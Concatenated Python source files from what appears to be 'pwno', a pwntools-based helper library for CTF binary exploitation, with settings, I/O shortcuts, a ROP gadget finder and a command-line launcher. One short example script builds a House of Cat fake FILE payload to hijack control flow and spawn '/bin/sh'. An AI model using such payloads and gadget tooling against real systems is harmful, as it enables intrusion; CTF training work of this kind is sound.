import inspect
from pathlib import Path

from pwno.context import *
from pwno.helper import *
from pwno.typing import *

frame = inspect.currentframe()
while frame.f_back:
    frame = frame.f_back


if Path(frame.f_globals["__file__"]).name != "pwno":
    default_main()




from pydantic import BaseModel, Field, field_validator
from pathlib import Path

class GeneralSettings(BaseModel):
# 默认缓存目录
    CACHE_DIR: str = Field(default=str(Path.home() / ".cache" / "pwno"), description="缓存目录")

    @field_validator("CACHE_DIR", mode="before")
    def _validate_cache_dir(cls, v):
        if not Path(v).exists():
            Path(v).mkdir(parents=True, exist_ok=True)
        return v


import inspect
from typing import Any, Callable, Tuple, TypeVar

from pwn import process, pwnlib, remote

T = TypeVar("T", bound=Callable[..., Any])


def get_instance(name: str = None, start: int = 1) -> Tuple[str, process | remote]:
    """
    拿取 process/remote 实例，如果没有传入 name 则会自动寻找
    当前上下文中最新的一个 process/remote 实例。
    参数：
        name(str)
            需要拿取的 process/remote 实例的名字
        force(bool)
            如果为 True，则会强制寻找当前上下文中最新的
            一个 process/remote 实例而不是传入的 name
        start(int)
            从第几层开始寻找，0 为当前栈，1 为上一栈帧，以此类推。
    返回：
        (name, instance)
            name 为实例的名字，instance 为实例本身
    """
    ctx = inspect.currentframe()
    for _ in range(start):
        ctx = ctx.f_back
        if ctx is None:
            break
    while ctx is not None:
        for k, v in reversed(ctx.f_locals.items()):
            if isinstance(
                v, (pwnlib.tubes.process.process, pwnlib.tubes.remote.remote)
            ):
                if name is not None:
                    if k == name:
                        return k, v
                    else:
                        continue
                return k, v
        ctx = ctx.f_back
    raise ValueError("No instance found")


def abbr(func: T) -> T:
    """
    提供一个函数的缩写，如果传入类则默认找到当前上下文中最新的一个实例(process/remote)。
    参数：
          func(Callable)
            需要缩写的函数，可以是类的方法或者普通函数，例如
            ``process.sendline`` 或 ``p.sendline``。

            对于前者，将会自动寻找当前上下文中最新的一个 process/remote 实例
            并调用其 sendline 方法

            对于后者，将会调用 p 的 sendline 方法

    默认提供了以下缩写，这些函数将使用 *最新* 的 process/remote 实例。
        >>> send  = process.send
        >>> sl = process.sendline
        >>> sa = process.sendafter
        >>> sla = process.sendlineafter

        >>> recv = process.recv
        >>> recvu = process.recvuntil
        >>> recvn = process.recvn
        >>> recvl = process.recvline

        >>> ia = process.interactive
    """
    f = func.__name__
    if inspect.ismethod(func):
        ctx = inspect.currentframe()
        flag = False
        while ctx is not None and not flag:
            ctx = ctx.f_back
            for k, v in reversed(ctx.f_locals.items()):
                if v == func.__self__:
                    name = k
                    flag = True
                    break
    else:
        name = None
    sh = None

    def inner(*args, **kwargs):
        nonlocal sh
        if (
            sh is None
            or (isinstance(sh, process) and sh.poll() is not None)
            or (isinstance(sh, remote) and (sh.closed["send"] or sh.closed["recv"]))
        ):
            # sh.poll() is not None means the process is closed
            _, sh = get_instance(name, start=2)
        # print(name, sh, sh.proc, sh.proc.pid)
        return getattr(sh, f)(*args, **kwargs)

    return inner


send = abbr(process.send)
sl = abbr(process.sendline)
sa = abbr(process.sendafter)
sla = abbr(process.sendlineafter)

recv = abbr(process.recv)
recvu = abbr(process.recvuntil)
recvn = abbr(process.recvn)
recvl = abbr(process.recvline)

ia = abbr(process.interactive)



from typing import Any

class Deprecated:
    def __init__(self, instance: Any, varname: str, replacement: str = None, msg: str = None):
        self._varname = varname
        self._instance = instance
        self._replacement = replacement
        self._msg = msg
        self._warning_shown = False

    def __getattr__(self, name):
        if not self._warning_shown:
            print("\033[1m\033[93m[!] Warning:\033[0m \033[1m", self._construct_msg(), "\033[0m", sep='')
            self._warning_shown = True
        return getattr(self._instance, name)
    
    def _construct_msg(self):
        if self._msg is None:
            msg = f"'{self._varname}' is deprecated and will be removed shortly."
            if self._replacement is not None:
                msg += f" Use '{self._replacement}' instead."
            return msg
        return self._msg.format(varname=self._varname, replacement=self._replacement)




from pwno import *
from pwno.helper.IO import HouseOfCat

sh = gen_sh()
sh.recvuntil(b"p: ")
heap = int(recvl(keepends=False), 16)
sh.recvuntil(b"puts: ")
libc.address = int(recvl(keepends=False), 16) - libc.sym["puts"]
sh.recvuntil(b"backd00r: ")
backd00r = int(recvl(keepends=False), 16)

cat = HouseOfCat()
cat.fake_io_addr = heap
cat.rdi = b"/bin/sh\x00"
cat.rdx = p64(0xCAFEC0DE)
cat.call_addr = p64(backd00r)
# cat.vtable = p64(libc.sym['_IO_wfile_jumps'] + 0x30)

send(bytes(cat))
ia()



from argparse import ArgumentParser

from pwn import ELF

from ..gadget import pprint_gadgets


def main():
    parser = ArgumentParser(description="Search gadgets in binary")
    parser.add_argument(
        "--force", "-f", action="store_true", help="Force search gadgets"
    )
    parser.add_argument(
        "--prefix",
        "-p",
        help="The prefix to use for the variables",
        action="store",
    )
    parser.add_argument(
        "--regs",
        "-r",
        help="The registers to use for the variables",
        action="append",
        default=[],
    )
    parser.add_argument(
        "--insts",
        "-i",
        help="The instructions together with a `ret`",
        action="append",
        default=[],
    )
    parser.add_argument(
        "--strs",
        "-s",
        help="The strings to search for",
        action="append",
        default=[],
    )
    parser.add_argument("file", help="The binary file to search gadgets in")
    args = parser.parse_args()
    args.file = ELF(args.file, checksec=False)
    args.prefix = (
        args.prefix
        if args.prefix
        else ("elf.address" if args.file.elftype == "EXEC" else "libc.address")
    )
    pprint_gadgets(**vars(args))



import os
import toml
import atexit

from pathlib import Path
from typing import Tuple, Type

from pydantic_settings import (
    BaseSettings,
    SettingsConfigDict,
    PydanticBaseSettingsSource,
    TomlConfigSettingsSource
)
from .general import GeneralSettings
from .context import ContextSettings
# 配置文件路径
_DEFAULT_CONFIG_PATH = Path.home() / ".config" / "pwno" / "config.toml"

CONFIG_FILE = os.environ.get("PWNO_CONFIG_PATH") or _DEFAULT_CONFIG_PATH

class Settings(BaseSettings):
    model_config = SettingsConfigDict(
        extra="ignore",
        toml_file=CONFIG_FILE
    )

    general: GeneralSettings = GeneralSettings()
    context: ContextSettings = ContextSettings()

    def save(self):
        if self.model_config["toml_file"] != _DEFAULT_CONFIG_PATH:
            return
        try:
            if not Path(_DEFAULT_CONFIG_PATH).parent.exists():
                Path(_DEFAULT_CONFIG_PATH).parent.mkdir(parents=True, exist_ok=True)
            with Path(_DEFAULT_CONFIG_PATH).open("w") as file:
                toml.dump(self.model_dump(), file)
        except Exception as e:
            print(f"保存配置文件时发生错误: {e}")

    @classmethod
    def settings_customise_sources(
        cls,
        settings_cls: Type[BaseSettings],
        init_settings: PydanticBaseSettingsSource,
        env_settings: PydanticBaseSettingsSource,
        dotenv_settings: PydanticBaseSettingsSource,
        file_secret_settings: PydanticBaseSettingsSource,
    ) -> Tuple[PydanticBaseSettingsSource, ...]:
        return (TomlConfigSettingsSource(settings_cls), env_settings, init_settings)

settings = Settings()
atexit.register(settings.save)


import pickle
from itertools import chain
from pathlib import Path

from pwn import ELF
from ropper import Gadget, RopperService

from ..settings import settings
from ..typing import ELFType


def load_gadgets(file: ELFType, force=None, **kwargs) -> RopperService:
    """
    查找 file 的 gadgets，如果 file 是 DYN 类型的 ELF，则会缓存 gadgets

    Args:
        file (ELFType): 要查找 gadgets 的 ELF 文件
        force (bool, optional): 是否不使用缓存查找 gadgets. Defaults to None.

    Returns:
        RopperService: RopperService 实例
    """
    if isinstance(file, (str, Path)):
        file = ELF(file, checksec=False)
    cache = file.elftype == "DYN"

    options = {
        "color": False,
        "badbytes": "",
        "all": False,
        "inst_count": 6,
        "type": "all",
        "detailed": False,
    }
    options.update(kwargs)

    if cache:
        cache_file = Path(settings.general.CACHE_DIR) / file.buildid.hex()
        if not cache_file.exists() or force:
            rs = RopperService(options)
            rs.addFile(file.path)
            rs.loadGadgetsFor()
            gadgets = rs.getFileFor(file.path).gadgets
            pickle.dump(gadgets, cache_file.open("wb"))
        else:
            rs = RopperService(options)
            rs.addFile(file.path)
            rs.files[0].gadgets = pickle.load(cache_file.open("rb"))
            rs.files[0].analyzed = True

    else:
        rs = RopperService(options)
        rs.addFile(file.path)
        rs.loadGadgetsFor()

    return rs


def pprint_gadgets(
    file: ELFType,
    force: bool = False,
    prefix: str = "libc.address",
    regs: list[str] = [],
    insts: list[str] = [],
    strs: list[str] = [],
    **kwargs,
) -> None:
    """
    打印 file 的 gadgets, 以及 strings。返回可在 exp 中使用的常量

    Args:
        file (ELFType): 要查找 gadgets 的 ELF 文件
        force (bool, optional): 是否不使用缓存查找 gadgets. Defaults to False.
        prefix (str, optional): 变量的前缀. Defaults to "libc.address".
        regs (list[str], optional): 寄存器列表. Defaults to [].
        insts (list[str], optional): 指令列表. Defaults to [].
        strs (list[str], optional): 字符串列表. Defaults to [].

    Returns:
        None
    """
    rs = load_gadgets(file, force=force, **kwargs)
    if not regs and not insts and not strs:
        regs = ["rdi", "rsi", "rdx", "rax"]
        insts = [
            "syscall",
        ]
        strs = ["/bin/sh"]

    queries = list()
    if regs:
        queries += (f"pop {reg}; ret;" for reg in regs)
    if insts:
        queries += (f"{inst}; ret;" for inst in insts)
    queries = "|".join(chain(queries))

    def gadget_to_var(gadget: str):
        return gadget.replace(";", "").strip().replace(" ", "_")

    def string_to_var(string: str):
        return string.replace("/", "").replace(".", "").replace("-", "")
    
    gadgets = []
    strings = []

    if queries:
        gadgets = rs.search(queries)
        for g in gadgets:
            gadget: Gadget = g[1]
            print(
                f"{gadget_to_var(gadget.simpleInstructionString())} = "
                f"{prefix + ' + ' if prefix else ''}"
                f"{gadget.address:#x}  # {gadget._gadget}"
            )

    if strs:
        strings = rs.searchString("|".join(strs))
        strings: list[tuple[int, bytes]] = next(iter(strings.values()), [])
    for address, string in strings:
        print(
            f"{string_to_var(string.decode())} = {prefix + ' + ' if prefix else ''}"
            f"{address:#x}  # {string.decode()}"
        )



from pydantic import BaseModel, field_validator

class ContextSettings(BaseModel):

    # context.terminal
    terminal: list[str] = []
    log_level: str = "debug"
    os: str = "linux"

    @field_validator("terminal", mode="before")
    def validate_terminal(cls, v):
        if isinstance(v, str):
            return v.split(" ")
        return v
    


import subprocess
import builtins
from argparse import ArgumentParser
from pathlib import Path

from elftools.common.exceptions import ELFError
from pwn import *
from pwn import elf as pwn_elf
del elf

from pydantic import (
    BaseModel,
    Field,
    ValidationError,
    ValidationInfo,
    field_validator,
    model_validator,
)
from typing_extensions import Annotated

from ..common.deprecate import Deprecated
# ------- Default Settings -------
class Config(BaseModel, extra="ignore"):
    ATTACHMENT: Annotated[str, Field(validate_default=True)] = None
    RUNARGS: str = ""
    LIBC: Annotated[str, Field(validate_default=True)] = None
    HOST: str = ""
    PORT: int = 0

    NO_DEBUG: bool = False
    REMOTE: bool = False
    GDB: bool = False  # gdb.debug(elf.path, gdbscript=gdbscript)
    GDB_SCRIPT: Annotated[str, Field(validate_default=True)] = None
    DBG: Annotated[list[int], Field(validate_default=True)] = None

    @field_validator("ATTACHMENT", mode="before")
    def _attachment(cls, value) -> str:
        if value is None:

            def is_elf(path: Path):
                try:
                    result = subprocess.run(
                        ["file", str(path)], capture_output=True, text=True
                    )
                    return "ELF" in result.stdout and "executable" in result.stdout
                except Exception:
                    return False

            for file in Path.cwd().iterdir():
                if file.is_file() and is_elf(file):
                    return str(file.absolute())
            return "/bin/sh"  # fallback
        return value

    @field_validator("DBG", mode="before")
    def _dbg(cls, value) -> list[int]:
        if value is None:
            return []
        return [int(i) for i in value.split(",")]

    @field_validator("GDB_SCRIPT", mode="before")
    def _gdb_script(cls, value) -> str:
        if value is None:
            return ""
        if Path(value).is_file():
            return Path(value).read_text()
        return value.replace("\\n", "\n")

    @field_validator("LIBC", mode="before")
    def _libc(cls, value: str | None, info_: ValidationInfo) -> str:
        if value is None:
            output_raw = subprocess.run(
                ["ldd", info_.data.get("ATTACHMENT", "/bin/sh")],
                capture_output=True,
                text=True,
            ).stdout.split("\n")

            libc_patterns = [
                lambda x: "libc.so.6" in x,
                lambda x: "libc-2" in x,
            ]
            output = filter(lambda x: any(p(x) for p in libc_patterns),
                             output_raw)
            libc_path = None
            for line in output:
                libc_path = next(
                    filter(
                        lambda x: Path(x).is_file(), line.strip("\t").strip().split(" ")
                    ),
                    None,
                )
                if libc_path:
                    break
            return libc_path
        return value

    @model_validator(mode="before")
    def ignore_None(cls, values):
        fin = {k: v for k, v in values.items() if v is not None}
        keys = list(fin.keys())
        if ("HOST" in keys and "PORT" not in keys) or (
            "PORT" in keys and "HOST" not in keys
        ):
            raise ValidationError("Host and Port should be both set.")

        if "REMOTE" in fin.keys():
            rmt = values["REMOTE"].split(":")
            fin["HOST"] = rmt[0]
            fin["PORT"] = int(rmt[1])
            fin["REMOTE"] = True
        return fin


def default_main():
    """
    We should set `builtins.config, builtins.elf, builtins.libc`
    As they were None when imported, and then initialized in this function.
    
    This avoid the reference problem when using `from pwno import *`
    """
    parser = ArgumentParser(description="Pwnable Commandline")

    parser.add_argument("ATTACHMENT", nargs="?")
    parser.add_argument("--libc", "-l", nargs="?", dest="LIBC")
    parser.add_argument(
        "--debug",
        "-d",
        action="store",
        dest="DBG",
        help=(
            "Which dbg() to be executed, default is `all`"
            "use comma to split. e.g. `-d 0,1,3`"
        ),
    )
    parser.add_argument(
        "--no-debug",
        "-D",
        action="store_true",
        dest="NO_DEBUG",
        help="Disable debug mode",
    )
    parser.add_argument(
        "--remote", "-r", action="store", dest="REMOTE", help="Remote host:port"
    )
    parser.add_argument(
        "--host",
        "-H",
        action="store",
        dest="HOST",
        help="Remote host, if remote is set, this option will be ignored",
    )
    parser.add_argument(
        "--port",
        "-p",
        action="store",
        dest="PORT",
        help="Remote port, if remote is set, this option will be ignored",
    )
    parser.add_argument(
        "--gdb",
        "-g",
        action="store_true",
        dest="GDB",
        help="Run binary using gdb.debug",
    )
    parser.add_argument(
        "--gdb-script",
        "-G",
        action="store",
        dest="GDB_SCRIPT",
        help="GDB script to run",
    )
    parser.add_argument(
        "--args", "-a", action="store", dest="RUNARGS", help="Arguments to run binary"
    )
    parser.add_argument(
        "--checksec", "-c", action="store_true", help="Check security of the binary"
    )

    args = parser.parse_args()

    global config, elf, libc

    # set_export(config, Config(**vars(args)))
    builtins.config = Config(**vars(args))
    if not args.ATTACHMENT:
        info('No Attachment set, using "%s"...', config.ATTACHMENT)
    if not args.LIBC:
        info('No Libc set, using "%s"...', config.LIBC)

    try:
        # set_export(elf, ELF(config.ATTACHMENT, checksec=args.checksec))
        builtins.elf = ELF(config.ATTACHMENT, checksec=args.checksec)
        builtins.Elf = Deprecated(elf, 'Elf', 'elf')
        context.arch = elf.arch
    except ELFError:
        builtins.elf = None
        log.warning(f"{config.ATTACHMENT} is not a valid ELF file!, `elf` is not set")
    try:
        # set_export(libc, ELF(config.LIBC, checksec=args.checksec))
        builtins.libc = ELF(config.LIBC, checksec=args.checksec)
    except ELFError:
        log.warning(f"{config.LIBC} is not a valid ELF file!, `libc` is not set")


config: Config
elf: ELF
Elf: ELF  # Deprecated
libc: ELF
